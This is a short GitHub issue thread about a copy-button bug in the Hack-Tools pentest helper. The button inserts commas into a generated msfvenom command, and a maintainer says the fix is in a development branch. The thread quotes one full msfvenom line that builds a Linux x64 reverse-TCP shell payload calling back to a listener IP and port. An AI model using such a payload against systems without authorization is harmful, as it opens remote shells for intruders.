### ISSUE TITLE
Cannot build shell via msfvenom

### ISSUE THREAD

**Issue by GiangTieuDau** [LasCC/Hack-Tools#121]
**Hi,** 
It seems the **copy icon** at syntax of **MSF Venom Command** is not correct

When I paste in Terminal Console or Notepad, it always insert comma between each selection

`msfvenom -p ,linux/x64/shell/reverse_tcp, LHOST=10.10.16.15, LPORT=4444, --platform linux, -a x64,false,false,false,false, -f elf, -o reverse-x64.exe`

**→ If I remove all the comma, it works**

**Regards!**

**Comment by rb-x** [comment]
Thank you, the issue was fixed in the dev branch for the 0.5 version that is coming soon.
